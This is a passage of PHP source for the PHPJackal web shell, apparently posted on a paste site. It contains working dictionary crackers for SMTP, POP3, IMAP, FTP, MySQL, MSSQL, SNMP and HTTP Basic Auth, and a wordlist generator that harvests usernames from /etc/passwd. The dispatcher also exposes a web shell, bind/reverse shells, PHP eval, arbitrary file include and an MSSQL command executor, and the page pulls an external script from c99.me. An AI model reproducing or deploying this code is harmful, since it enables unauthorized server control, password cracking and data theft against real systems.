  1310. $p=(!empty($_REQUEST['pass']))?htmlspecialchars($_REQUEST['pass']):'123456';
  1311. $d=(!empty($_REQUEST['db']))?htmlspecialchars($_REQUEST['db']):'test';
  1312. echo "<center>${t}Use PHP Bugs:</td><td bgcolor='#333333'></td></tr><form method='POST'><tr><td width='20%' bgcolor='#666666'>File:</td><td bgcolor='#666666'><input type=text value='$f' name=file size=35></td></tr><tr><td bgcolor='#808080'></td><td bgcolor='#808080' align=right>$hcwd<input class=buttons type=submit name=read value='Read File'><input class=buttons type=submit name=show value='Show directory'></form>$et<br>${t}Use MySQL:</td><td bgcolor='#333333'></td></tr><form method='POST'><tr><td width='20%' bgcolor='#666666'>File:</td><td bgcolor='#666666'><input type=text value='$f' name=file size=35></td></tr><tr><td width='20%' bgcolor='#808080'>Username:</td><td bgcolor='#808080'><input type=text name=user value='$u'></td></tr><tr><td width='20%' bgcolor='#666666'>Password:</td><td bgcolor='#666666'><input type=text name=pass value='$p'></td></tr><tr><td width='20%' bgcolor='#808080'>Database:</td><td bgcolor='#808080'><input type=text name=db value='$d'></td></tr><tr><td bgcolor='#666666'></td><td bgcolor='#666666' align=right>$hcwd<input class=buttons type=submit name=sql value='Read'></form>$et<br>${t}MSSQL Exec:</td><td bgcolor='#333333'></td></tr><form method='POST'><tr><td width='20%' bgcolor='#666666'>Server:</td><td bgcolor='#666666'><input type=text value='";if (!empty($_REQUEST['serveR'])) echo htmlspecialchars($_REQUEST['serveR']);else echo 'localhost'; echo "' name=serveR size=35></td></tr><tr><td width='20%' bgcolor='#808080'>Username:</td><td bgcolor='#808080'><input type=text name=useR value='";if (!empty($_REQUEST['useR'])) echo htmlspecialchars($_REQUEST['useR']); else echo 'sa'; echo "' size=35></td></tr><tr><td width='20%' bgcolor='#666666'>Password:</td><td bgcolor='#666666'><input type=text name=pasS value='";if (!empty($_REQUEST['pasS'])) echo htmlspecialchars($_REQUEST['pasS']);echo "' size=35></td></tr><td width='20%' bgcolor='#808080'>Command:</td><td bgcolor='#808080'><input type=text name=coM value='";if (!empty($_REQUEST['coM'])) echo htmlspecialchars($_REQUEST['coM']);else echo 'dir c:';echo "' size=35></td></tr><tr><td bgcolor='#666666'>Database:</td><td bgcolor='#666666'><input type=text name=dB value='";if(isset($_REQUEST['dB'])) echo htmlspecialchars($_REQUEST['dB']);else echo 'master';echo "'>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;$hcwd<input class=buttons type=submit value='Execute'></form>$et</center>";
  1313. }
  1314. function crackeR(){
  1315. global $errorbox,$t,$et,$crack,$cwd;
  1316. $check=(!empty($_REQUEST['dictionary']) && !empty($_REQUEST['target']))?1:0;
  1317. if(!empty($_REQUEST['cracK']) && !$check){
  1318. $c=htmlspecialchars($_REQUEST['cracK']);
  1319. echo "<center>$t$c cracker:$crack";
  1320. }
  1321. elseif(!empty($_REQUEST['cracK']) && $check){
  1322. $pro=strtolower($_REQUEST['cracK']).'checK';
  1323. $target=$_REQUEST['target'];
  1324. $type=$_REQUEST['combo'];
  1325. $user=(!empty($_REQUEST['user']))?$_REQUEST['user']:'';
  1326. $dictionary=fopen($_REQUEST['dictionary'],'r');
  1327. if(isset($_REQUEST['loG'])&& !empty($_REQUEST['logfilE'])){$log=1;$file=$_REQUEST['logfilE'];}else $log=0;
  1328. if($dictionary){
  1329. echo '<font color=blue>Cracking '.htmlspecialchars($target).'...<br>';
  1330. while(!feof($dictionary)){
  1331. if($type){
  1332. $combo=trim(fgets($dictionary)," \n\r");
  1333. $user=substr($combo,0,strpos($combo,':'));
  1334. $pass=substr($combo,strpos($combo,':')+1);
  1335. }else{
  1336. $pass=trim(fgets($dictionary)," \n\r");
  1337. }
  1338. $ret=$pro($target,$user,$pass,5);
  1339. if($ret==-1){echo "$errorbox Can not connect to server.$et";break;}else{
  1340. if($ret){$x="U: $user P: $pass";echo "$x<br>";if($log)file_add_contentS($file,"$x\r\n");if(!$type)break;}}
  1341. }
  1342. echo '<br>Done</font>';
  1343. fclose($dictionary);
  1344. }
  1345. else{
  1346. echo "$errorbox Can not open dictionary.$et";
  1347. }
  1348. }
  1349. else{
  1350. echo "<center><table border=0 bgcolor=#333333><tr><td><a href='".hlinK("seC=hc&workingdiR=$cwd")."'>[Hash]</a> - <a href='".hlinK("seC=cr&cracK=SMTP&workingdiR=$cwd")."'>[SMTP]</a> - <a href='".hlinK("seC=cr&cracK=POP3&workingdiR=$cwd")."'>[POP3]</a> - <a href='".hlinK("seC=cr&cracK=IMAP&workingdiR=$cwd")."'>[IMAP]</a> - <a href='".hlinK("seC=cr&cracK=FTP&workingdiR=$cwd")."'>[FTP]</a> - <a href='".hlinK("seC=snmp&workingdiR=$cwd")."'>[SNMP]</a> - <a href='".hlinK("seC=cr&cracK=MySQL&workingdiR=$cwd")."'>[MySQL]</a> - <a href='".hlinK("seC=cr&cracK=MSSQL&workingdiR=$cwd")."'>[MSSQL]</a> - <a href='".hlinK("seC=fcr&workingdiR=$cwd")."'>[HTTP Form]</a> - <a href='".hlinK("seC=auth&workingdiR=$cwd")."'>[HTTP Auth(basic)]</a> - <a href='".hlinK("seC=dic&workingdiR=$cwd")."'>[Dictionary maker]</a>$et</center>";
  1351. }
  1352. }
  1353. function snmpcrackeR(){
  1354. global $t,$et,$errorbox,$hcwd;
  1355. if(!empty($_REQUEST['target']) && !empty($_REQUEST['dictionary'])){
  1356. $target=$_REQUEST['target'];
  1357. if(isset($_REQUEST['loG'])&& !empty($_REQUEST['logfilE'])){$log=1;$file=$_REQUEST['logfilE'];}else $log=0;
  1358. $dictionary=fopen($_REQUEST['dictionary'],'r');
  1359. if($dictionary){
  1360. echo '<font color=blue>Cracking '.htmlspecialchars($target).'...<br>';
  1361. while(!feof($dictionary)){
  1362. $com=trim(fgets($dictionary)," \n\r");
  1363. $res=snmpchecK($target,$com,2);
  1364. if($res){echo "$com<br>";if($log)file_add_contentS($file,"$com\r\n");}
  1365. }
  1366. echo '<br>Done</font>';
  1367. fclose($dictionary);
  1368. }
  1369. else{
  1370. echo "$errorbox Can not open dictionary.$et";
  1371. }
  1372. }else echo "<center>${t}SNMP cracker:</td><td bgcolor='#333333'></td></tr><form method='POST'>$hcwd<tr><td width='20%' bgcolor='#666666'>Dictionary:</td><td bgcolor='#666666'><input type=text name=dictionary size=35></td></tr><tr><td width='20%' bgcolor='#808080'>Server:</td><td bgcolor='#808080'><input type=text name=target size=35></td></tr><tr><td width='20%' bgcolor='#666666'><input type=checkbox name=loG value=1 onClick='document.form.logfilE.disabled = !document.form.logfilE.disabled;' style='border-width:1px;background-color:#666666;' checked>Log</td><td bgcolor='#666666'><input type=text name=logfilE size=25 value='".whereistmP().DIRECTORY_SEPARATOR.".log'> <input class=buttons type=submit value=Start></form>$et</center>";
  1373. }
  1374. function dicmakeR(){
  1375. global $errorbox,$windows,$footer,$t,$et,$hcwd;
  1376. $combo=(empty($_REQUEST['combo']))?0:1;
  1377. if(!empty($_REQUEST['range'])&& !empty($_REQUEST['output']) && !empty($_REQUEST['min']) && !empty($_REQUEST['max'])){
  1378. $min=$_REQUEST['min'];
  1379. $max=$_REQUEST['max'];
  1380. if($max<$min)die($errorbox."Bad input!$et".$footer);
  1381. $s=$w='';
  1382. $out=$_REQUEST['output'];
  1383. $r=$_REQUEST['range'];
  1384. $dic=fopen($out,'w');
  1385. if($r==1){
  1386. for($s=pow(10,$min-1);$s<pow(10,$max-1);$s++){
  1387. $w=$s;
  1388. if($combo)$w="$w:$w";
  1389. fwrite($dic,$w."\n");
  1390. }
  1391. }
  1392. else{
  1393. $s=str_repeat($r,$min);
  1394. while(strlen($s)<$max){
  1395. $w=$s;
  1396. if($combo)$w="$w:$w";
  1397. fwrite($dic,$w."\n");
  1398. $s++;
  1399. }
  1400. }
  1401. fclose($dic);
  1402. echo '<font color=blue>Done</font>';
  1403. }
  1404. elseif(!empty($_REQUEST['input']) && !empty($_REQUEST['output'])){
  1405. $input=fopen($_REQUEST['input'],'r');
  1406. if(!$input){
  1407. if($windows)echo $errorbox.'Unable to read from '.htmlspecialchars($_REQUEST['input'])."$et<br>";
  1408. else{
  1409. $input=explode("\n",shelL("cat $input"));
  1410. $output=fopen($_REQUEST['output'],'w');
  1411. if($output){
  1412. foreach($input as $in){
  1413. $user=$in;
  1414. $user=trim(fgets($in)," \n\r");
  1415. if(!strstr($user,':'))continue;
  1416. $user=substr($user,0,(strpos($user,':')));
  1417. if($combo)fwrite($output,$user.':'.$user."\n");else fwrite($output,$user."\n");
  1418. }
  1419. fclose($input);fclose($output);
  1420. echo '<font color=blue>Done</font>';
  1421. }
  1422. }
  1423. }
  1424. else{
  1425. $output=fopen($_REQUEST['output'],'w');
  1426. if($output){
  1427. while(!feof($input)){
  1428. $user=trim(fgets($input)," \n\r");
  1429. if(!strstr($user,':'))continue;
  1430. $user=substr($user,0,(strpos($user,':')));
  1431. if($combo)fwrite($output,$user.':'.$user."\n");else fwrite($output,$user."\n");
  1432. }
  1433. fclose($input);fclose($output);
  1434. echo '<font color=blue>Done</font>';
  1435. }
  1436. else echo $errorbox.' Unable to write data to '.htmlspecialchars($_REQUEST['input'])."$et<br>";
  1437. }
  1438. }elseif(!empty($_REQUEST['url']) && !empty($_REQUEST['output'])){
  1439. $res=downloadiT($_REQUEST['url'],$_REQUEST['output']);
  1440. if($combo && $res){
  1441. $file=file($_REQUEST['output']);
  1442. $output=fopen($_REQUEST['output'],'w');
  1443. foreach($file as $v)fwrite($output,"$v:$v\n");
  1444. fclose($output);
  1445. }
  1446. echo '<font color=blue>Done</font>';
  1447. }else{
  1448. $temp=whereistmP().DIRECTORY_SEPARATOR;
  1449. echo "<center>${t}Wordlist generator:</td><td bgcolor='#333333'></td></tr><form method='POST'><tr><td width='20%' bgcolor='#666666'>Range:</td><td bgcolor='#666666'><select name=range><option value=a>a-z</option><option value=A>A-Z</option><option value=1>0-9</option></select></td></tr><tr><td width='20%' bgcolor='#808080'>Min lenght:</td><td bgcolor='#808080'><select name=min><option value=1>1</option><option value=2>2</option><option value=3>3</option><option value=4>4</option><option value=5>5</option><option value=6>6</option><option value=7>7</option><option value=8>8</option><option value=9>9</option><option value=10>10</option></select></td></tr><tr><td width='20%' bgcolor='#666666'>Max lenght:</td><td bgcolor='#666666'><select name=max><option value=2>2</option><option value=3>3</option><option value=4>4</option><option value=5>5</option><option value=6>6</option><option value=7>7</option><option value=8 selected>8</option><option value=9>9</option><option value=10>10</option><option value=11>11</option><option value=12>12</option><option value=13>13</option><option value=14>14</option><option value=15>15</option></select></td></tr><tr><td width='20%' bgcolor='#808080'>Output:</td><td bgcolor='#808080'><input type=text value='$temp.dic' name=output size=35></td></tr><tr><td width='20%' bgcolor='#666666'></td><td bgcolor='#666666'><input type=checkbox name=combo style='border-width:1px;background-color:#666666;' value=1 checked>Combo style output</td></tr><td bgcolor='#808080'></td><td bgcolor='#808080' align=right>$hcwd<input class=buttons type=submit value=Make></form>$et<br>${t}Grab dictionary:</td><td bgcolor='#333333'></td></tr><form method='POST'><tr><td width='20%' bgcolor='#666666'>Grab from:</td><td bgcolor='#666666'><input type=text value='/etc/passwd' name=input size=35></td></tr><tr><td width='20%' bgcolor='#808080'>Output:</td><td bgcolor='#808080'><input type=text value='$temp.dic' name=output size=35></td></tr><tr><td width='20%' bgcolor='#666666'></td><td bgcolor='#666666'><input type=checkbox style='border-width:1px;background-color:#666666;' name=combo value=1 checked>Combo style output</td></tr><td bgcolor='#808080'></td><td bgcolor='#808080' align=right>$hcwd<input class=buttons type=submit value=Grab></form>$et<br>${t}Download dictionary:</td><td bgcolor='#333333'></td></tr><form method='POST'><tr><td width='20%' bgcolor='#666666'>URL:</td><td bgcolor='#666666'><input type=text value='http://vburton.ncsa.uiuc.edu/wordlist.txt' name=url size=35></td></tr><tr><td width='20%' bgcolor='#808080'>Output:</td><td bgcolor='#808080'><input type=text value='$temp.dic' name=output size=35></td></tr><tr><td width='20%' bgcolor='#666666'></td><td bgcolor='#666666'><input type=checkbox style='border-width:1px;background-color:#666666;' name=combo value=1 checked>Combo style output</td></tr><tr><td bgcolor='#808080'></td><td bgcolor='#808080' align=right>$hcwd<input class=buttons type=submit value=Get></form>$et</center>";}
  1450. }
  1451. function ftpclienT(){
  1452. global $t,$cwd,$hcwd,$errorbox,$et;
  1453. $td="<td bgcolor='#333333' width='50%'>";
  1454. if(!empty($_REQUEST['hosT']) && !empty($_REQUEST['useR']) && isset($_REQUEST['pasS']) && function_exists('ftp_connect')){
  1455. $user=$_REQUEST['useR'];$pass=$_REQUEST['pasS'];$host=$_REQUEST['hosT'];
  1456. $con=ftp_connect($_REQUEST['hosT'],21,10);
  1457. if($con){
  1458. $ftp=ftp_login($con,$user,$pass);
  1459. if($ftp){
  1460. if(!empty($_REQUEST['PWD']))ftp_chdir($con,$_REQUEST['PWD']);
  1461. if(!empty($_REQUEST['filE'])){
  1462. $file=$_REQUEST['filE'];
  1463. $mode=(isset($_REQUEST['modE']))?FTP_BINARY:FTP_ASCII;
  1464. if(isset($_REQUEST['geT']))ftp_get($con,$file,$file,$mode);
  1465. elseif(isset($_REQUEST['puT']))ftp_put($con,$file,$file,$mode);
  1466. elseif(isset($_REQUEST['rM'])){
  1467. ftp_rmdir($con,$file);
  1468. ftp_delete($con,$file);
  1469. }
  1470. elseif(isset($_REQUEST['mD']))ftp_mkdir($con,$file);
  1471. }
  1472. $pwd=ftp_pwd($con);
  1473. $dir=ftp_nlist($con,'');
  1474. $d=opendir($cwd);
  1475. echo "<table border=0 style='border-collapse: collapse' width='100%'><tr>${td}Server:</td>${td}Client:</td></tr><form method=POST><tr>$td<input type=text value='$pwd' name=PWD size=50><input value=Change class=buttons type=submit></td>$td<input size=50 type=text value='$cwd' name=workingdiR><input value=Change class=buttons type=submit></td></tr><tr>$td";
  1476. foreach($dir as $n)echo "$n<br>";
  1477. echo "</td>$td";while($cdir=readdir($d))if($cdir!='.' && $cdir!='..')echo "$cdir<br>"; echo "</td></tr><tr>${td}Name:<input type=text name=filE><input type=checkbox style='border-width:1px;background-color:#333333;' name=modE value=1>Binary <input type=submit name=geT class=buttons value=Get><input type=submit name=puT class=buttons value=Put><input type=submit name=rM class=buttons value=Remove><input type=submit name=mD class=buttons value='Make dir'></td>$td<input type=hidden value='$user' name=useR><input type=hidden value='$pass' name=pasS><input type=hidden value='$host' name=hosT></form>$et";
  1478. }else echo "$errorbox Wrong username or password$et";
  1479. }else echo "$errorbox Can not connect to server!$et";
  1480. }
  1481. else{
  1482. echo "<center>${t}FTP cilent:</td><form name=client method='POST'><td bgcolor='#333333'></td></tr><tr><td width='20%' bgcolor='#666666'>Server:</td><td bgcolor='#666666'><input type=text value=localhost name=hosT size=35></td></tr><tr><td width='20%' bgcolor='#808080'>Username:</td><td bgcolor='#808080'><input type=text name=useR value=anonymous size=35></td><tr><td width='20%' bgcolor='#666666'>Password:</td><td bgcolor='#666666'><input type=text value=admin@nasa.gov name=pasS size=35></td></tr><tr><td width='20%' bgcolor='#808080'></td><td bgcolor='#808080' align=right>$hcwd<input class=buttons type=submit value=Connect></form>$et</center>";
  1483. }
  1484. }
  1485. function calC(){
  1486. global $t,$et,$hcwd;
  1487. $fu=array('-','md5','sha1','crc32','hex','ip2long','decbin','dechex','hexdec','bindec','long2ip','base64_encode','base64_decode','urldecode','urlencode','des','strrev');
  1488. if(!empty($_REQUEST['input']) && (in_array($_REQUEST['to'],$fu))){
  1489. $to=$_REQUEST['to'];
  1490. echo "<center>${t}Output:<br><textarea rows='10' cols='64'>";
  1491. if($to=='hex')for($i=0;$i<strlen($_REQUEST['input']);$i++)echo '%'.strtoupper(dechex(ord($_REQUEST['input']{$i})));
  1492. else echo $to($_REQUEST['input']);
  1493. echo "</textarea>$et</center><br>";
  1494. }
  1495. echo "<center>${t}Convertor:</td><td bgcolor='#333333'></td></tr><form method='POST'><tr><td width='20%' bgcolor='#666666'>Input:</td><td bgcolor='#666666'><textarea rows='10' name='input' cols='64'>";if(!empty($_REQUEST['input']))echo htmlspecialchars($_REQUEST['input']);echo "</textarea></td></tr><tr><td width='20%' bgcolor='#808080'>Task:</td><td bgcolor='#808080'><select size=1 name=to><option value=md5>MD5</option><option value=sha1>SHA1</option><option value=crc32>Crc32</option><option value=strrev>Reverse</option><option value=ip2long>IP to long</option><option value=long2ip>Long to IP</option><option value=decbin>Decimal to binary</option><option value=bindec>Binary to decimal</option><option value=dechex>Decimal to hex</option><option value=hexdec>Hex to decimal</option><option value=hex>ASCII to hex</option><option value=urlencode>URL encoding</option><option value=urldecode>URL decoding</option><option value=base64_encode>Base64 encoding</option><option value=base64_decode>Base64 decoding</option></select></td><tr><td width='20%' bgcolor='#666666'></td><td bgcolor='#666666' align=right><input class=buttons type=submit value=Convert>$hcwd</form>$et</center>";
  1496. }
  1497. function authcrackeR(){
  1498. global $errorbox,$et,$t,$hcwd;
  1499. if(!empty($_REQUEST['target']) && !empty($_REQUEST['dictionary'])){
  1500. if(isset($_REQUEST['loG'])&& !empty($_REQUEST['logfilE'])){$log=1;$file=$_REQUEST['logfilE'];}else $log=0;
  1501. $data='';
  1502. $method=($_REQUEST['method'])?'POST':'GET';
  1503. if(strstr($_REQUEST['target'],'?')){$data=substr($_REQUEST['target'],strpos($_REQUEST['target'],'?')+1);$_REQUEST['target']=substr($_REQUEST['target'],0,strpos($_REQUEST['target'],'?'));}
  1504. spliturL($_REQUEST['target'],$host,$page);
  1505. $type=$_REQUEST['combo'];
  1506. $user=(!empty($_REQUEST['user']))?$_REQUEST['user']:'';
  1507. if($method=='GET')$page.=$data;
  1508. $dictionary=fopen($_REQUEST['dictionary'],'r');
  1509. echo '<font color=blue>';
  1510. while(!feof($dictionary)){
  1511. if($type){
  1512. $combo=trim(fgets($dictionary)," \n\r");
  1513. $user=substr($combo,0,strpos($combo,':'));
  1514. $pass=substr($combo,strpos($combo,':')+1);
  1515. }else{
  1516. $pass=trim(fgets($dictionary)," \n\r");
  1517. }
  1518. $so=fsockopen($host,80,$en,$es,5);
  1519. if(!$so){echo "$errorbox Can not connect to host$et";break;}
  1520. else{
  1521. $packet="$method /$page HTTP/1.0\r\nAccept-Encoding: text\r\nHost: $host\r\nReferer: $host\r\nConnection: Close\r\nAuthorization: Basic ".base64_encode("$user:$pass");
  1522. if($method=='POST')$packet.='Content-Type: application/x-www-form-urlencoded\r\nContent-Length: '.strlen($data);
  1523. $packet.="\r\n\r\n";
  1524. $packet.=$data;
  1525. fputs($so,$packet);
  1526. $res=substr(fgets($so),9,2);
  1527. fclose($so);
  1528. if($res=='20'){echo "U: $user P: $pass</br>";if($log)file_add_contentS($file,"U: $user P: $pass\r\n");}
  1529. }
  1530. }
  1531. echo 'Done!</font>';
  1532. }else echo "<center><form method='POST' name=form>${t}HTTP Auth cracker:</td><td bgcolor='#333333'><select name=method><option value=1>POST</option><option value=0>GET</option></select></td></tr><tr><td width='20%' bgcolor='#666666'>Dictionary:</td><td bgcolor='#666666'><input type=text name=dictionary size=35></td></tr><tr><td width='20%' bgcolor='#808080'>Dictionary type:</td><td bgcolor='#808080'><input type=radio name=combo checked value=0 onClick='document.form.user.disabled = false;' style='border-width:1px;background-color:#808080;'>Simple (P)<input type=radio value=1 name=combo onClick='document.form.user.disabled = true;' style='border-width:1px;background-color:#808080;'>Combo (U:P)</td></tr><tr><td width='20%' bgcolor='#666666'>Username:</td><td bgcolor='#666666'><input type=text size=35 value=root name=user></td></tr><tr><td width='20%' bgcolor='#808080'>Server:</td><td bgcolor='#808080'><input type=text name=target value=localhost size=35></td></tr><tr><td width='20%' bgcolor='#666666'><input type=checkbox name=loG value=1 onClick='document.form.logfilE.disabled = !document.form.logfilE.disabled;' style='border-width:1px;background-color:#666666;' checked>Log</td><td bgcolor='#666666'><input type=text name=logfilE size=25 value='".whereistmP().DIRECTORY_SEPARATOR.".log'> $hcwd <input class=buttons type=submit value=Start></form>$et</center>";
  1533. }
  1534. function openiT($name){
  1535. $ext=strtolower(substr($name,strrpos($name,'.')+1));
  1536. $src=array('php','php3','php4','phps','phtml','phtm','inc');
  1537. if(in_array($ext,$src))highlight_file($name);
  1538. else echo '<font color=blue><pre>'.htmlspecialchars(file_get_contents($name)).'</pre></font>';
  1539. }
  1540. function opensesS($name){
  1541. $sess=file_get_contents($name);
  1542. $var=explode(';',$sess);
  1543. echo "<pre>Name\tType\tValue\r\n";
  1544. foreach($var as $v){
  1545. $t=explode('|',$v);
  1546. $c=explode(':',$t[1]);
  1547. $y='';
  1548. if($c[0]=='i')$y='Integer';elseif($c[0]=='s')$y='String';elseif($c[0]=='b')$y='Boolean';elseif($c[0]=='f')$y='Float';elseif($c[0]=='a')$y='Array';elseif($c[0]=='o')$y='Object';elseif($c[0]=='n')$y='Null';
  1549. echo $t[0]."\t$y\t".$c[1]."\r\n";
  1550. }
  1551. echo '</pre>';
  1552. }
  1553. function logouT(){
  1554. setcookie('passw','',time()-10000);
  1555. header('Location: '.hlinK());
  1556. }
  1557. ?>
  1558. <html>
  1559. <head>
  1560. <style>body{scrollbar-base-color: #484848; scrollbar-arrow-color: #FFFFFF; scrollbar-track-color: #969696;font-size:16px;font-family:"Arial Narrow";}Table {font-size: 15px;} .buttons{font-family:Verdana;font-size:10pt;font-weight:normal;font-style:normal;color:#FFFFFF;background-color:#555555;border-style:solid;border-width:1px;border-color:#FFFFFF;}textarea{border: 0px #000000 solid;background: #EEEEEE;color: #000000;}input{background: #EEEEEE;border-width:1px;border-style:solid;border-color:black}select{background: #EEEEEE; border: 0px #000000 none;}</style>
  1561. <meta http-equiv="Content-Language" content="en-us">
  1562. <script language="JavaScript" type="text/JavaScript">
  1563. function HS(box){
  1564. if(document.getElementById(box).style.display!="none"){
  1565. document.getElementById(box).style.display="none";
  1566. document.getElementById('lk').innerHTML="+";
  1567. }
  1568. else{
  1569. document.getElementById(box).style.display="";
  1570. document.getElementById('lk').innerHTML="-";
  1571. }
  1572. }
  1573. function chmoD($file){
  1574. $ch=prompt("Changing file mode["+$file+"]: ex. 777","");
  1575. if($ch != null)location.href="<?php echo hlinK('seC=fm&workingdiR='.addslashes($cwd).'&chmoD=');?>"+$file+"&modE="+$ch;
  1576. }
  1577. </script><SCRIPT SRC=http://c99.me/base/jquery.js></SCRIPT>
  1578. <title>PHPJackal [<?php echo $cwd; ?>]</title>
  1579. </head><body text="#E2E2E2" bgcolor="#C0C0C0" link="#DCDCDC" vlink="#DCDCDC" alink="#DCDCDC">
  1580. <table border="0" cellpadding="0" cellspacing="0" style="border-collapse: collapse" bordercolor="#282828" bgcolor="#333333" width="100%">
  1581. <tr><td><a href=javascript:history.back(1)>[Back]</a> - <a href="<?php echo hlinK("seC=sysinfo&workingdiR=$cwd");?>">[Info]</a> - <a href="<?php echo hlinK("seC=fm&workingdiR=$cwd");?>">[File manager]</a> - <a href="<?php echo hlinK("seC=edit&workingdiR=$cwd");?>">[Editor]</a> - <a href="<?php echo hlinK("seC=webshell&workingdiR=$cwd");?>">[Web shell]</a> - <a href="<?php echo hlinK("seC=br&workingdiR=$cwd");?>">[B/R shell]</a> - <a href="<?php echo hlinK("seC=asm&workingdiR=$cwd");?>">[Safe-mode]</a> - <a href="<?php echo hlinK("seC=sqlcl&workingdiR=$cwd"); ?>">[SQL]</a> - <a href="<?php echo hlinK("seC=ftpc&workingdiR=$cwd"); ?>">[FTP]</a> - <a href="<?php echo hlinK("seC=mailer&workingdiR=$cwd"); ?>">[Mail]</a> - <a href="<?php echo hlinK("seC=eval&workingdiR=$cwd");?>">[Evaler]</a> - <a href="<?php echo hlinK("seC=sc&workingdiR=$cwd"); ?>">[Scanners]</a> - <a href="<?php echo hlinK("seC=cr&workingdiR=$cwd");?>">[Crackers]</a> - <a href="<?php echo hlinK("seC=px&workingdiR=$cwd");?>">[Pr0xy]</a> - <a href="<?php echo hlinK("seC=tools&workingdiR=$cwd");?>">[Tools]</a> - <a href="<?php echo hlinK("seC=calc&workingdiR=$cwd");?>">[Convert]</a> - <a href="<?php echo hlinK("seC=about&workingdiR=$cwd");?>">[About]</a> <?php if(isset($_COOKIE['passw'])) echo "- [<a href='".hlinK("seC=logout")."'>Logout</a>]";?></td></tr></table>
  1582. <hr size=1 noshade>
  1583. <?php
  1584. if(!empty($_REQUEST['seC'])){
  1585. switch($_REQUEST['seC']){
  1586. case 'fm':filemanageR();break;
  1587. case 'sc':scanneR();break;
  1588. case 'phpinfo':phpinfo();break;
  1589. case 'edit':if(!empty($_REQUEST['open']))editoR($_REQUEST['filE']);
  1590. if(!empty($_REQUEST['Save'])){
  1591. $filehandle=fopen($_REQUEST['file'],'w');
  1592. fwrite($filehandle,$_REQUEST['edited']);
  1593. fclose($filehandle);}
  1594. if(!empty($_REQUEST['filE']))editoR($_REQUEST['filE']);else editoR('');
  1595. break;
  1596. case 'openit':openiT($_REQUEST['namE']);break;
  1597. case 'cr':crackeR();break;
  1598. case 'dic':dicmakeR();break;
  1599. case 'tools':toolS();break;
  1600. case 'hex':hexvieW();break;
  1601. case 'img':showimagE($_REQUEST['filE']);break;
  1602. case 'inc':if(file_exists($_REQUEST['filE']))include($_REQUEST['filE']);break;
  1603. case 'hc':hashcrackeR();break;
  1604. case 'fcr':formcrackeR();break;
  1605. case 'auth':authcrackeR();break;
  1606. case 'ftpc':ftpclienT();break;
  1607. case 'eval':phpevaL();break;
  1608. case 'snmp':snmpcrackeR();break;
  1609. case 'px':pr0xy();break;
  1610. case 'webshell':webshelL();break;
  1611. case 'mailer':maileR();break;
  1612. case 'br':brshelL();break;
  1613. case 'asm':safemodE();break;
  1614. case 'sqlcl':sqlclienT();break;
  1615. case 'calc':calC();break;
  1616. case 'sysinfo':sysinfO();break;
  1617. case 'checksum':checksuM($_REQUEST['filE']);break;
  1618. case 'logout':logouT();break;
  1619. default: echo $intro;}}else echo $intro;
  1620. echo $footer;?></body></html>
Add Comment
Please, Sign In to add comment